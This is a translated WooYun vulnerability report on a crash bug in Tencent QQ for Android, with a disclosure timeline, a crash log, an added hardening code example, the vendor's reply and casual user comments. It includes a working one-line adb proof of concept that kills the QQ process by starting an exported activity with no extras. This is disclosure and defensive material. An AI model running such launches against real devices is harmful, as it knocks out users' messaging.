
Vulnerability summary (followers: 24)

Bug ID: wooyun-2014-048176

Title: Tencent Messenger (QQ) DoS vulnerability (critical)

Vendor: Tencent (腾讯)

Author: Pentest.mobi

Submitted: 2014-01-07 15:54

Fix date: 2014-04-04 15:55

Published: 2014-04-04 15:55

Type: denial of service

Severity: high

Self-assessed rank: 16

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-01-07: details sent to the vendor, awaiting vendor response
2014-01-08: vendor chose to ignore the vulnerability; details opened to third-party security partners
2014-03-04: details opened to core white hats and domain experts
2014-03-14: details opened to regular white hats
2014-03-24: details opened to intern white hats
2014-04-04: details opened to the public

Summary:

Tencent Messenger (QQ) version 4.5.2 has a critical DoS vulnerability that needs to be handled.

Details:

The activity component com.tencent.mobileqq.activity.QQBrowserDelegationActivity is exported, so any third-party app on the device can start it, and starting it without the extras it expects crashes the process. The crash log below shows the mechanism: onCreate() calls MttApi.loadUrlInMbWnd(), which passes the caller-supplied URL straight to Uri.parse(); when the URL is absent, Uri.parse(null) throws NullPointerException("uriString"), the exception escapes onCreate(), and ActivityManager force-finishes the activity and tears down the whole com.tencent.mobileqq process. The MSF.S.AppProcessManager lines further down show the consequence: incoming push messages can no longer be delivered because there is no QQ process to receive them. Since the launch needs no permission and no extras, any installed app can repeat it at will.
Process name: com.tencent.mobileqq
Version: 4.5.2
Affected package (APK): http://pan.baidu.com/s/1lEFzo
PoC (from an adb shell; no extras are passed, which is what triggers the crash):
am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity
Crash log:

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420): at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420): at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420): at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420): at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420): at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420): ... 11 more
W/ActivityManager( 78): Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService( 78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService( 78): unable to find stats for iface rmnet0
I/WindowManager( 78): createSurface Window{414395e0 paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager( 78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger( 78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager( 78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager( 78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager( 78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService
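The following is an added example, not code from QQ or from the report's author. It reconstructs the crash pattern visible in the stack trace above (a caller-supplied URL handed to Uri.parse() with no null check inside onCreate()) and shows one way to harden such an exported browser-delegation activity. The extra name "url", the package and class names, and the loadUrl() stand-in for MttApi.loadUrlInMbWnd() are all assumptions; the real extra key used by QQ is not given on the page.

```java
// Added example (hypothetical package/class names). Not Tencent's code.
package com.example.browserdelegation;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import java.util.Locale;

public class BrowserDelegationActivity extends Activity {
    private static final String TAG = "BrowserDelegation";

    // Assumed extra key; the key the real activity reads is not on the page.
    public static final String EXTRA_URL = "url";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();

        // Vulnerable pattern, matching the trace above: the extra goes straight
        // into Uri.parse(). A launch without extras, e.g.
        //   am start -n <pkg>/<activity>
        // makes getStringExtra() return null, Uri.parse(null) throws
        // NullPointerException("uriString") inside onCreate(), and the whole
        // process dies, not just this activity.
        //
        //   String url = intent.getStringExtra(EXTRA_URL);
        //   loadUrl(Uri.parse(url));   // NPE when the extra is absent

        Uri target = safeTarget(intent);
        if (target == null) {
            // Refuse the request instead of crashing: finish() ends only this
            // activity and leaves the rest of the process (message handling,
            // services) running.
            Log.w(TAG, "missing or unacceptable url extra, ignoring launch");
            finish();
            return;
        }
        loadUrl(target);
    }

    /**
     * Validates the caller-supplied URL and returns null for anything that
     * should not be opened. Every input an exported component receives is
     * attacker-controlled, so the checks happen before any parsing result is used.
     */
    static Uri safeTarget(Intent intent) {
        if (intent == null) {
            return null;
        }
        String raw = intent.getStringExtra(EXTRA_URL);
        if (raw == null || raw.trim().isEmpty()) {
            return null;                       // the exact case that crashed 4.5.2
        }
        Uri uri = Uri.parse(raw);              // safe: raw is non-null here
        String scheme = uri.getScheme();
        if (scheme == null) {
            return null;                       // relative or scheme-less input
        }
        scheme = scheme.toLowerCase(Locale.ROOT);
        // Usual hardening for an externally reachable browser entry point:
        // allow only web schemes, so a caller cannot point the in-app browser
        // at file:, content:, javascript: or app-private schemes.
        if (!"http".equals(scheme) && !"https".equals(scheme)) {
            return null;
        }
        if (uri.getHost() == null || uri.getHost().isEmpty()) {
            return null;                       // "http:" with no authority
        }
        return uri;
    }

    private void loadUrl(Uri uri) {
        // Stand-in for handing the URL to the in-app browser
        // (MttApi.loadUrlInMbWnd in the real app).
    }
}

// The other half of the fix lives in AndroidManifest.xml (assumed entry):
// if the activity only ever needs to be started from within the app itself,
// stop exporting it at all, which removes the attack surface entirely:
//
//   <activity
//       android:name=".activity.QQBrowserDelegationActivity"
//       android:exported="false" />
//
// If it must stay reachable from other apps, keep exported="true" and rely on
// the input validation above (or guard it with a signature-level permission).
```

To check whether a given build still exposes the component, dump the binary manifest and look at the activity's android:exported attribute and whether it declares intent filters (an activity with an intent filter is exported by default on older Android targets): `aapt dump xmltree app.apk AndroidManifest.xml`.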

Proof of concept:

[Screenshot: DOS-QQ1.jpg]


[Screenshot: DOS-QQ2.jpg]

Fix recommendation:

Copyright notice: when reposting, credit the source as Pentest.mobi@乌云


Vendor response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2014-04-04 15:55

Vendor reply:

Thank you very much for your report. The issue described in the report no longer exists in the latest version. Thank you for your attention to Tencent's services. If you have any questions, feel free to send us feedback and we will have someone follow up.

Latest status:

None


Vulnerability rating:

Comments

  1. 2014-01-07 16:47 | 瘦蛟舞 (certified white hat) ( regular white hat | Rank: 687 | Vulns: 78 | The iron armour is still here)

    Looks impressive~

  2. 2014-01-07 17:39 | wefgod ( regular white hat | Rank: 1807 | Vulns: 179 | Willing but unable)

    The big shots all like to show off a bit of English, huh

  3. 2014-01-07 18:13 | 233 ( passer-by | Rank: 14 | Vulns: 4 | Kids can't control themselves after seeing this)

    You're saying what?

  4. 2014-01-07 18:46 | HoerWing ( passer-by | Rank: 24 | Vulns: 4 | "People should not be afraid of their go...)

    Can you not speak your fucking English?

  5. 2014-01-07 20:04 | JJFly ( passer-by | Rank: 2 | Vulns: 1 | www.yidianjiujijifly.com www.y...)

    My CET-3 still hasn't passed, what do I do, someone carry me through the exam

  6. 2014-01-08 09:21 | sdj ( intern white hat | Rank: 45 | Vulns: 6 | The most amazing group of people, wise, low-key and reserved, commonly known as sock puppets...)

    Title's kinda badass.

  7. 2014-01-08 10:16 | leehenwu ( regular white hat | Rank: 194 | Vulns: 24 | Lu·ah·lu)

    Blah blah

  8. 2014-01-08 10:18 | 4399gdww ( passer-by | Rank: 20 | Vulns: 4 | )

    I can speak Chinese? Yes, fuck.

  9. 2014-01-08 10:34 | hqdvista ( regular white hat | Rank: 154 | Vulns: 31 | N/A)

    Eyeballing it, it's that thing

  10. 2014-01-08 13:29 | 小震 ( passer-by | Rank: 8 | Vulns: 3 | ~)

    I don't even know what you're all talking about. Anyway, my English is very good, and what you're speaking isn't standard English~

  11. 2014-01-08 13:44 | 4399gdww ( passer-by | Rank: 20 | Vulns: 4 | )

    @小震 badass

  12. 2014-01-08 22:43 | 雷锋 ( passer-by | Rank: 12 | Vulns: 2 | Available for: drilling, scaffolding, carpentry, electrical work, plumbing, lab...)

    Every loser's essential tool: Google Translate

  13. 2014-01-10 17:07 | Enjoy_Hacking ( intern white hat | Rank: 84 | Vulns: 8 | Time is silent, and so it goes.)

    Badass!